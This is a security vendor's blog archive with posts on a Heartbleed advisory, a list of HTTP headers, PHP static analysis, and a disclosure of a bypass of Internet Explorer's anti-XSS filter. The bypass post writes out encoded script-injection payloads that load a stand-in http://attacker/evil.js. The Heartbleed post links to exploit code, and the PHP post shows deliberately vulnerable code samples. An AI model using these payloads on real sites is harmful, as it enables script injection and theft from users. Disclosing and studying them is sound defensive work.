Category Archives: Tools and Applications

#HackerKast 31: RSA San Francisco

We have a special and rare treat this week on HackerKast: Jeremiah, Matt and Robert all together in San Francisco for RSAC. They give a brief overview of some of the interesting conversations and topics they’ve come across.

A recurring topic in conversations with Robert is about how DevOps can improve security and help find vulnerabilities faster. Matt mentions Gauntlt, a cool new project that he contributes to. Gauntlt is a tool that puts security tools into your build-pipeline to test for vulnerabilities before the code goes to production.

Matt also mentions that his buddies at Verizon came out with data showing that people aren’t getting hacked by mobile apps. We haven’t seen large data breaches via mobile apps lead to any financial loss. With the recent surge in mobile use for sensitive data, are these types of data breaches something we should worry about?

On a more pleasant note, Jer was happy to hear that people and companies are realizing the importance of security. Industry leaders are now showing interest in doing application security the right way through a holistic approach.

Also at RSA, Jer talks security guarantees while Matt/Kuskos dive into our Top 10 Web Hacks.

dnstest – Monitor Your DNS for Hijacking

In light of the latest round of attacks against and/or hijacking of DNS, it occurred to me that most people really don’t know what to do about it. More importantly, many companies don’t even notice they’ve been attacked until a customer complains. Especially for smaller companies who may not have as many customers, or only accept comments through a website, they may never know unless they randomly check, or the attacker releases the site and the flood of complaints comes rolling in after the fact.

So I wrote a little tool called “dnstest.pl” (yes a Perl script) that can be run out of cron and can monitor one or more hostname-to-IP-address pairs of sites that are critical to you. If anything happens it’ll send you an alert via email. There are other tools that do this or similar things, but it’s another tool in your arsenal; and most importantly dnstest is meant to be very lightweight and simple to use. You can download dnstest here.

Of course this is only the first step. Reacting quickly to the alert simply reduces the outage and the chance of customer complaints or similar damage. If you like it but want it to do something else, go ahead and fork it. Enjoy!

Aviator Going Open Source

One of the most frequent criticisms we’ve heard at WhiteHat Security about Aviator is that it’s not open source. There were a great many reasons why we didn’t start off that way, not the least of which was getting the legal framework in place to allow it, but we also didn’t want our efforts to be distracted by external pressures while we were still slaving away to make the product work at all.

But now that we’ve been running for a little more than a year, we’re ready to turn over the reins to the public. We’re open sourcing Aviator to allow experts to audit the code and also to let industrious developers contribute to it. Yes, we are actually open sourcing the code completely, not just from a visibility perspective.

Why do this? I suspect many people just want to be able to look at the code, and don’t have a need to – or lack the skills to – contribute to it. But we also received some really compelling questions from the people who have an active interest in the Tor community who expressed an interest in using something based on Chromium, and who also know what a huge pain it is to make something work seamlessly. For them, it would be a lot easier to start with a more secure browser that had removed a lot of the Google specific anti-privacy stuff, than to re-invent the wheel. So why not Aviator? Well, after much work with our legal team the limits of licensing are no longer an issue, so now that is now a real possibility. Aviator is now BSD (free as in beer) licensed!

So we hope that people use the browser and make it their own. We won’t be making any additional changes to the browser; Aviator is now entirely community-driven. We’ll still sign the releases, QA them and push them to production, but the code itself will be community-driven. If the community likes Aviator, it will thrive, and now that we have a critical mass of technical users and people who love it, it should be possible for it to survive on its own without much input from WhiteHat.

As an aside, many commercial organizations discontinue support of their products, but they regularly fail to take the step of open sourcing their products. This is how Windows XP dies a slow death in so many enterprises, unpatched, unsupported and dangerously vulnerable. This is how MMORPG video games die or become completely unplayable once the servers are dismantled. We also see SAAS companies discontinue services and allow only a few weeks or months for mass migrations without any easy alternatives in sight. I understand the financial motives behind planned obsolescence, but it’s bad for the ecosystem and bad for the users. This is something the EFF is working to resolve and something I personally feel that all commercial enterprises should do for their users.

If you have any questions or concerns about Aviator, we’d love to hear from you. Hopefully this is the browser “dream come true” that so many people have been asking for, for so long. Thank you all for supporting the project and we hope you have fun with the code. Aviator’s source code can be found here on Github. You don’t need anything to check it out. If you want to commit to it, shoot me an email with your github account name and we’ll hook you up. Go forth! Aviator is yours!

Security Guaranteed: Customers Deserve Nothing Less

WhiteHat Security Sentinel Elite

Ever notice how everything in the information security industry is sold “as is”? No guarantees, no warrantees, no return policies. This provides little peace of mind that any of the billions that are spent every year on security products and services will deliver as advertised. In other words, there is no way of ensuring that what customers purchase truly protects them from getting hacked, breached, or defrauded. And when these security products fail – and I do mean when – customers are left to deal with the mess on their own, letting the vendors completely off the hook. This does not seem fair to me, so I can only imagine how a customer might feel in such a case. What’s worse, any time someone mentions the idea of a security guaranty or warranty, the standard retort is “perfect security is impossible,” “we provide defense-in-depth,” or some other dismissive and ultimately unaccountable response.

Still, the naysayers have a valid point. Given enough time and energy, everything can be hacked, including security products, but this admission does not inspire much confidence in those who buy our warez and whose only fear is getting hacked. We, as an industry, are not doing anything to alleviate that fear. With something as important as information security is today, personally I think customers deserve more assurance. I believe customers should demand accountability from their vendors in particular. I believe the “as is” culture in security is something the industry must move away from. Why? Because if it were incumbent upon vendors to stand by their product(s) we would start to see more push against the status quo and, perhaps, even renewed innovation.

At the core of the issue is bridging the gap between the “nothing-is-perfect” mindset and the business requirements for providing security guarantees.

If you think about it, many other industries already offer guarantees, warrantees, or 100% return policies for less than perfect products. Examples include electronics, clothing, cars, lawn care equipment, and basically anything you buy on Amazon. As we know, all these items have defect rates, yet it doesn’t appear to prevent those sellers from standing behind their products. Perhaps the difference is, unlike most security vendors, these merchants know their product failure rates and replacement costs. This business insight is precisely why they’re willing to reimburse their customers accordingly. Security vendors by contrast tend NOT to know their failure rates, and if they do, they’re likely horrible (anti-virus is a perfect example of this). As such, vendors are unwilling to put their money where their mouth is, the “as is” culture remains, and interests between security vendor and customer are misaligned.

The key then, is knowing the security performance metrics and failure rates (i.e. having enough data on how the bad guys broke in and why the security controls failed) of the products. With this information in hand, offering a security guarantee is not only possible, but essential!

WhiteHat Security is in a unique position to lead the charge away from selling “as is” and towards security guarantees. We can do this, because we have the data and metrics to prove our performance. Other Software-as-a-Service vendors could theoretically do the same, and we encourage them to consider doing so.

For example, at WhiteHat we help our customers protect their websites from getting hacked by identifying vulnerabilities and helping to get them fixed before they’re exploited. If the bad guys are then unable to find and exploit a vulnerability we missed, or if they decide to move on to easier targets, that’s success! Failure, on the other hand, is missing a vulnerability we should have found which results in the website getting hacked. This metric – the product failure rate – is something any self-respecting vulnerability assessment vendor should track very closely. We do, and here’s how we bring it all together:

  1. WhiteHat’s Sentinel scanning platform and the 100+ person army of Web security experts behind it in our Threat Research Center (TRC) tests tens of thousands of websites on a 24x7x365 basis. We’ve been doing this for more than a decade and we have a larger and more accurate website vulnerability data set than anyone else. We know with a fine degree of accuracy what vulnerabilities we are able to identify – and which ones we are not.
  2. We also have data sharing relationships with Verizon (and others) on the incident side of the equation. This is to say we have good visibility into what attack techniques the bad guys are trying and what they’re likely to successfully exploit. This insight helps us focus R&D resources towards the vulnerabilities that matter most.
  3. We also have great working relationships with our customers so that when something unfortunate does occur – which can be anything from something as simple as a ‘missed’ vulnerability, to a site that was no longer being scanned by our solution that contained a vulnerability, all the way to a real breach – we’re in the loop. This is how we can determine whether something we missed and should have found actually results in a breach.

Bottom line: in the past 10+ years of performing countless assessments and identifying millions of vulnerabilities, there have been only a small number of instances in which we missed a vulnerability that we should have found that we know was likely used to cause material harm to our customers. All told, our failure rate is far less than even one percent (<.01%), which is an impressive track record and one that we are quite proud of. I am not familiar with any other software scanning vendor who even claims to know what their failure rate metric is, let alone has the confidence to publicly talk about it. And it is for this reason that we can confidently stand behind our own security guarantee for customers with the new Sentinel Elite.

Introducing: Sentinel Elite

Sentinel Elite is a brand new service line from WhiteHat in which we deploy our best and most comprehensive website vulnerability assessment processes. Sentinel Elite builds on the proven security of WhiteHat Sentinel, which offers the lowest false-positive rate of any web application security solution available as well as more than 10 years of website vulnerability assessment experience. This service, combined with a one-of-a-kind security guarantee from WhiteHat gives customers the confidence in both their purchase decisions as well as the integrity of their websites and data.

Sentinel Elite customers will have access to a dedicated subject matter expert (SME) who expedites communication and response times, as well as coordinates the internal and external activities supporting your applications security program. The SME will also supply prioritized guidance support, so customers know which vulnerabilities to fix first… or not! Customers also receive access to the WhiteHat Limited Platinum Support program, which includes a one-hour SLA, quarterly summaries and exploit reviews, as well as a direct line to our TRC. Sentinel Elite customers must in turn provide us with what we need to do our work, such as giving us valid website credentials and taking action to remediate identified vulnerabilities. Provided everyone does what they are responsible for, our customers can rest assured that their website and critical applications will not be breached. And we are prepared to stand behind that claim.

If it happens that a website covered by Sentinel Elite gets hacked, specifically using a vulnerability we missed and should have found, the customer will be refunded in full. It’s that simple.

We know there will be those in the community who will be skeptical. That’s the nature of our industry and we understand the skepticism. In the past, other security vendors have offered half-hearted or gimmicky guarantees, but that’s not what we’re doing here. We’re serious about web security, we always have been. We envision an industry where outcomes and results matter, a future where all security products come with security guarantees, and most importantly, a future where the vendors’ best interests are in line with their customers’ best interests. How amazing would that be not only for customers but also for the Internet and the world we live, work and do business in? Sentinel Elite is the first of many steps we are taking to make this a reality.

For more information about Sentinel Elite, please click here.

WhiteHat Security Observations and Advice about the Heartbleed OpenSSL Exploit

The Heartbleed SSL attack is one of the most significant, and media-covered, vulnerabilities affecting the Internet in recent years. According to Netcraft, 17.5% of SSL-enabled sites on the Internet were vulnerable to the Heartbleed SSL attack just prior to its disclosure.

The vulnerable versions of OpenSSL were first released to the public 2 years ago. The implications of 2 years of exposure to this vulnerability are significant, and we will explore that more at the end of this article. First – immediate details:

This attack does not require any MitM (Man in the Middle) or other complex setups that SSL exploits usually require. This attack can be executed directly and anonymously against any webserver/device running a vulnerable version OpenSSL, and yield a wealth of sensitive information.

WhiteHat Security’s Threat Research Center (TRC) began testing customers for vulnerability to this attack immediately, using a custom SSL-testing tool from our TRC R&D labs. Our initial conclusions were that the frequency with which sites were vulnerable to this attack was low on production applications being monitored by the WhiteHat Sentinel security service. In our first test sample, covering 18,000 applications, we found a vulnerability rate of about 2% – much lower than Netcraft’s 17.5% vulnerability rate for all SSL-enabled websites. This may be a result of a biased sample, since we only evaluated applications under Sentinel service. (This may be because application owners who use Sentinel are already more security-conscious than most.)

While the frequency of vulnerability to the Heartbleed SSL attack is low: those that are vulnerable are severely vulnerable. Everything in memory on the webserver/device running a vulnerable version of OpenSSL is exposed. This includes:

  • UserIDs
  • Passwords
  • PII (Personally Identifiable Information)
  • SSL certificate private keys (e.g.-SSL using this cert will never be private again, if compromised)
  • Any private crypto keys
  • SSL-based Chat
  • SSL-based VPN
  • SSL-based anything
  • Connection Strings (Database userIDs/Passwords) to back-end databases, mainframes, LDAP, partner systems, etc. loaded in memory
  • Additional vulnerabilities in source code, that are loaded into memory, with precise locations (e.g.-Blind SQL injection)
  • Basically any code or data in memory on the server running a vulnerable version of OpenSSL is rendered in clear-text to all attackers

The most important thing you need to know regarding the above: this attack leaves no traces. No logs. Nothing suspect. It is a nice, friendly, read-only anonymous dump of memory. This is the digital equivalent of accidentally leaving a copy of your corporate diary, with all sorts of private secrets, on the seat of the mass-transit bus for everyone to read – including strangers you will never know. Your only recourse for secrets like passwords now is the delete key.

The list of vulnerable applications published to date includes mainstream web and mobile applications, security devices with web interfaces, and critical business applications handling sensitive and federally-regulated data.

This is a seriously sub-optimal situation.

Timeline of the Heartbleed SSL attack and WhiteHat Security’s response:

April 7th: Heartbleed 0day attack published. Websites vulnerable to the attack included major websites/email services that the majority of the Internet uses daily, and many mobile applications that use OpenSSL.

April 8th: WhiteHat TRC begins testing customers’ sites for vulnerability to Heartbleed SSL exploitation. In parallel, WhiteHat R&D begins QAing new automated tests to enable Sentinel services to identify this vulnerability at scale.

April 9th: WhiteHat TRC identifies roughly 350 websites vulnerable to Heartbleed SSL attack, out of initial sample of 18,000 production applications. We find an initial 1.9% average exploitability but this percentage appears to drop rapidly in the next 48 hours.

April 10th: WhiteHat R&D releases new Sentinel Heartbleed SSL vulnerability tests, enabling Sentinel to automatically identify if any applications under Sentinel service are vulnerable to Heartbleed SSL attacks with every scan. This brings test coverage to over 35,000 applications. Average vulnerability rate drops to below 1% by EOD April 10th.

Analysis: the more applications we scan using the new Heartbleed SSL attack tests, the fewer sites (by percent) we find vulnerable to this attack. We suspect this is because most customers have moved quickly to patch this vulnerability, due to the extreme severity of the vulnerability and the intense media coverage of the issue.

Speculation: we suspect that this issue will quickly disappear for most important SSL-enabled applications on the Internet – especially applications under some type of active DAST or SAST scanning service. It will likely linger on with small sites hosted by providers that do not offer (or pay attention to) any form of security patching service.

We also expect this issue to persist with internal (non-Internet-facing) applications and devices that use SSL, but which are commonly not tested or monitored by tools or services capable of detecting this vulnerability, and that are less frequently upgraded.

While the attack surface of internal network applications & devices may appear to be much smaller than Internet-facing applications, simple one-click exploits are already available on the Internet, usable by anyone on your network with access to a web browser. (link to exploit code: http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html)

This means that any internal user on your network who downloads one of these exploits is capable of extracting everything in memory from any device or application on your internal network that is vulnerable. This includes:

  • Internal routers and switches
  • Firewalls and IDS systems
  • Human Resources applications
  • Finance and payroll applications
  • Pretty much any application or device running a vulnerable version of OpenSSL
  • Agents exploiting internal devices will see all network traffic or application data in memory on the affected device/application

Due to the fact that most of these internal applications and devices lack the type of logging and alerting that would notify Information Security teams of active abuse of this vulnerability, our concern is that in coming months these internal devices & applications may provide rich grounds for exploitation that may never be discovered.

Conclusion & Recommendations:
The scope, impact, and ease-of-exploitation of this vulnerability make it one of the worst in Internet history. However, patches are readily available for most systems, and the impact risk of patching seems minimal. It appears most of our customers have already patched the majority of their Internet-facing systems against this exploit.

However, this vulnerability has existed for up to 2 years in OpenSSL implementations. We will likely never know if anyone has been actively exploiting this vulnerability, due to difficultly in logging/tracking attacks. If your organization is concerned about this, we recommend that — in addition to patching this vulnerability — SSL certificates of suspect systems be revoked and re-issued. We also recommend that all end-user passwords and system passwords be changed on suspect systems.

Is this vulnerability a “boy that cried wolf” hype situation? Bruce Schneier has another interesting perspective on this: https://www.schneier.com/blog/archives/2014/04/heartbleed.html.

WhiteHat will continue to share more information about this vulnerability as further information becomes available.

General reference material:
https://blog.whitehatsec.com/heartbleed-openssl-vulnerability/
https://www.schneier.com/blog/archives/2014/04/heartbleed.html/

Vulnerability details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160

Exploit details:
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html

Summaries:
http://business.kaspersky.com/the-heart-is-bleeding-out-a-new-critical-bug-found-in-openssl/
http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html

Adding Open Source Framework Hardening to Your SDLC – Podcast

I talk with G.S. McNamara, Federal Information Security Senior Consultant, about fixing open source framework vulnerabilities, what to consider when pushing open source, how to implement a system around patches without impacting performance, and security considerations on framework selections.





Want to do a podcast with us? Signup to be part of our Unsung Hero program.

About our “Unsung Hero Program”
Every day app sec professionals tirelessly protect the Web, and we recognize that this is largely owed to a series of small victories. These represent untold stories. We want to help share your story. To learn more click here.

List of HTTP Response Headers

Every few months I find myself looking up up the syntax of a relatively obscure HTTP header. Regularly I find myself wondering why there isn’t a good definitive list of common HTTP Response headers anywhere. Usually the lists on the Internet are missing half a dozen HTTP headers. So I’ve taken care to gather a list all of the HTTP response headers I could find. Hopefully this is useful to you, and removes some of the mystique behind how HTTP works if you’ve never seen headers before.

Note: this does not include things like IncapIP or other proxy/service specific headers that aren’t standard, and nor does it include request headers.

Header Example Value Notes
Access-Control-Allow-Credentials true
Access-Control-Allow-Headers X-PINGOTHER
Access-Control-Allow-Methods PUT, DELETE, XMODIFY
Access-Control-Allow-Origin http://example.org
Access-Control-Expose-Headers X-My-Custom-Header, X-Another-Custom-Header
Access-Control-Max-Age 2520
Accept-Ranges bytes
Age 12
Allow GET, HEAD, POST, OPTIONS Commonly includes other things, like PROPFIND etc…
Alternate-Protocol 443:npn-spdy/2,443:npn-spdy/2
Cache-Control private, no-cache, must-revalidate
Client-Date Tue, 27 Jan 2009 18:17:30 GMT
Client-Peer 123.123.123.123:80
Client-Response-Num 1
Connection Keep-Alive
Content-Disposition attachment; filename=”example.exe”
Content-Encoding gzip
Content-Language en
Content-Length 1329
Content-Location /index.htm
Content-MD5 Q2hlY2sgSW50ZWdyaXR5IQ==
Content-Range bytes 21010-47021/47022
Content-Security-Policy, X-Content-Security-Policy, X-WebKit-CSP default-src ‘self’ Different header needed to control different browsers
Content-Security-Policy-Report-Only default-src ‘self'; …; report-uri /csp_report_parser;
Content-Type text/html Can also include charset information (E.g.: text/html;charset=ISO-8859-1)
Date Fri, 22 Jan 2010 04:00:00 GMT
ETag “737060cd8c284d8af7ad3082f209582d”
Expires Mon, 26 Jul 1997 05:00:00 GMT
HTTP /1.1 401 Unauthorized Special header, no colon space delimiter
Keep-Alive timeout=3, max=87
Last-Modified Tue, 15 Nov 1994 12:45:26 +0000
Link <http://www.example.com/>; rel=”cononical” rel=”alternate”
Location http://www.example.com/
P3P policyref=”http://www.example.com/w3c/p3p.xml”, CP=”NOI DSP COR ADMa OUR NOR STA”
Pragma no-cache
Proxy-Authenticate Basic
Proxy-Connection Keep-Alive
Refresh 5; url=http://www.example.com/
Retry-After 120
Server Apache
Set-Cookie test=1; domain=example.com; path=/; expires=Tue, 01-Oct-2013 19:16:48 GMT Can also include the secure and HTTPOnly flag
Status 200 OK
Strict-Transport-Security max-age=16070400; includeSubDomains
Timing-Allow-Origin www.example.com
Trailer Max-Forwards
Transfer-Encoding chunked compress, deflate, gzip, identity
Upgrade HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
Vary *
Via 1.0 fred, 1.1 example.com (Apache/1.1)
Warning Warning: 199 Miscellaneous warning
WWW-Authenticate Basic
X-Aspnet-Version 2.0.50727
X-Content-Type-Options nosniff
X-Frame-Options deny
X-Permitted-Cross-Domain-Policies master-only Used by Adobe Flash
X-Pingback http://www.example.com/pingback/xmlrpc
X-Powered-By PHP/5.4.0
X-Robots-Tag noindex,nofollow
X-UA-Compatible Chome=1
X-XSS-Protection 1; mode=block

If I’ve missed any response headers, please let us know by leaving a comment and I’ll add it into the list. Perhaps at some point I’ll create a similar list for Request headers, if people find this helpful enough.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page not cause immediate JavaScript code execution, that untrusted data from the injection is then marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of sections of the HTML standard: Decimal encodings and Hexadecimal encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 as part of HTML 4.0 (3.2.3: Character references), while Decimal encodings go back further to the first official HTML standard in HTML 2.0 in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the response body of a HTTP request, the browser will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword: >

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the usage of decimal and hexadecimal encodings are not the flaw, but rather two implementations that make use of the method that exploits the flaw. Often simple URL/URI-encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw with Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data and that injected trusted data is not subject to validation by Internet Explorer’s anti-XSS filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Announcing Support for PHP in WhiteHat Sentinel Source

It is with great pleasure that I formally announce support for the PHP programming language in WhiteHat Sentinel Source! Joining Java and CSharp, PHP is now a member of the family of languages supported by our static code analysis technology. Effective immediately, our users have the ability to start scheduling static analysis scans of web applications developed in PHP for security vulnerabilities. Accurately and efficiently supporting the PHP language was a tremendous engineering effort; a great reflection upon our Engine and Research and Development teams.

Static code analysis for security of the PHP programming language is nothing new. There are open source and commercial vendors already claiming support for this language and have done so for quite some time now. So what’s so special about the support for PHP in WhiteHat Sentinel Source? The answer centers on our advancement in the ability for static analysis to model and simulate the execution of PHP accurately. Almost every other PHP static code analysis offering is limited by the fact that it cannot overcome the unique challenges presented by dynamic programming languages, such as dynamic typing. With an inability to accurately model type information associated with expressions and statements, for example, users were unable to correctly capture rules needed to identify security vulnerabilities. WhiteHat Sentinel Source’s PHP offering ships with a highly tuned type inference system that piggy-backs off our patented Runtime Simulation algorithm to provide much deeper insight into source code – thereby overcoming the limitations of previous technologies.

Here is a classic PHP vulnerability that most, if not all, static code analysis tools should identify as a Cross-Site Scripting vulnerability:


$unsafe_variable = $_GET['user_input'];

echo "You searched for:<strong>".$unsafe_variable."</strong>";

This code retrieves untrusted data from the HTTP request, concatenates that input with string literals, and finally echoes that dynamically constructed content out to the HTML page. Writing static code analysis rules for any engine capable of data flow analysis is fairly straight forward… the return value of the _GET field access is a source of untrusted data and the first argument to the echo function invocation is a sink. Why is this easy to capture? Well… the signatures for the data types represented in the rules are incredibly simple. For example, the signature for the echo method is “echo(object)” where “echo” is the function name and “(object)” indicates that it accepts one argument whose data type is unknown. We assume all parameter types are the type ‘object’ to keep things simple; we cannot possibly know all parameter types for all function invocations without performing more rich analysis. Static analysis tools all have their own unique way of capturing security rules using a custom language. To keep discussions about static analysis security rules vendor agnostic, we will only be discussing rule writing and rule matching at the code signature level. Let’s agree on the format of [class name]->[function name]([one or more parameters]).

Let’s make this a little more interesting. Consider the following PHP code snippet that may or may not be indicative of a SQL Injection vulnerability:



$anonymous = new Anonymous ();

$anonymous->runQuery($_GET['name']);


This code instantiates a class called “Anonymous” and invokes the “runQuery” method of that class using unstrusted data from the HTTP request. Is this vulnerable to SQL Injection? Well – it depends on what runQuery does. Let’s assume that the Anonymous class is part of a 3rd party library for which we do not have the source or for which we simply do not want to include in the scan. Let’s also assume that we know runQuery dynamically generates and executes SQL queries and is thus considered a sink. Based on these assumptions, a manual code review would clearly indicate that yes, this is vulnerable to SQL Injection. But how would we do this with static analysis? Here’s where it gets tricky…

We want to mark the “runQuery” method of the “Anonymous” type as a sink for SQL commands such that if untrusted data is used as an argument to this method, then we have SQL Injection. The problem is we need to not only capture information about the “runQuery” in our sink rule, but we must also capture the fact that it is associated with the “Anonymous” class. The code signature that must be reflected in the security rule would look as follows: Anonymous->runQuery(object).

Unfortunately, basic forms of static analysis are unable to determine with reasonable confidence that $anonymous variable is of type Anonymous – in fact $anonymous could be of any type! As a result, the underlying engine is never able to match the security rule to the $anonymous->runQuery($_GET[‘name’]) statement resulting in a lost vulnerability.

How does WhiteHat Sentinel Source’s PHP offering overcome this problem? it’s simple… in theory. When the engine first runs, it builds a model of the source code and attempts to compare the date sink rule against the $anonymous->runQuery($_GET[‘name’]) method invocation. At this point, the only information we have about this statement is the method name and number of arguments producing a code signature as follows: ?->runQuery(object). Compare this signature to the signature represented in our sink rule: Anonymous->runQuery(object). Since we cannot know the type of the $anonymous variable at this point, we perform a partial match such that we only compare the method name and arguments to those captured in the security rule. Since the statement’s signature is a partial match to our rule’s signature, we mark the model as such and move on.

After processing all our security rules, the static code analysis engine will begin performing data flow analysis on top of our patented Runtime Simulation algorithm looking for security vulnerabilities. The engine will first see the expression “$anonymous = new Anonymous();” and actually record the fact that the $anonymous variable, at any point in the future, may be of type “Anonymous”. Next, the engine will hit the following statement “$anonymous->runQuery($_GET[‘name’]);”. This statement was previously marked with a SQL Injection sink via a partial match. We now have more information about the $anonymous variable and now check if it is a full match with the original security rule. The statement’s signature is now known to be: Anonymous->runQuery(object) which fully matches the signature represented by the sink security rule. With a full match realized, the engine treats this statement as a sink and flags the SQL Injection vulnerability correctly!

Ok – that was a little too easy. Let’s make this more challenging… consider the following PHP code snippet:


$anonymous = null;

if (funct_a() > funct_b()) {
     $anonymous = new Anonymous();
} elseif (funct_a() == funct_b()) {
     $anonymous = new NotSoAnonymous();
} else {
     $anonymous = new NsaAnonymous();
}

$anonymous->runQuery($_GET['name']);

What the heck does the engine do now when it sees the runQuery statement? The engine will collect all data type assignments for the $anonymous variable and use all such types in an attempt to realize a full matching for the runQuery statement. The engine will see three different possible code signatures for the statement. They are as follows:

Anonyous->runQuery(object)
NotSoAnonymous->runQuery(object)
NsaAnonymous->runQuery(object)

The engine will take these three signatures and compare to the data type found in the signature represented by the partial match security rule. Given that the first of three signatures fully matches the signature represented by the security rule, the engine will treat the statement as a sink and flag the SQL Injection vulnerability correctly!

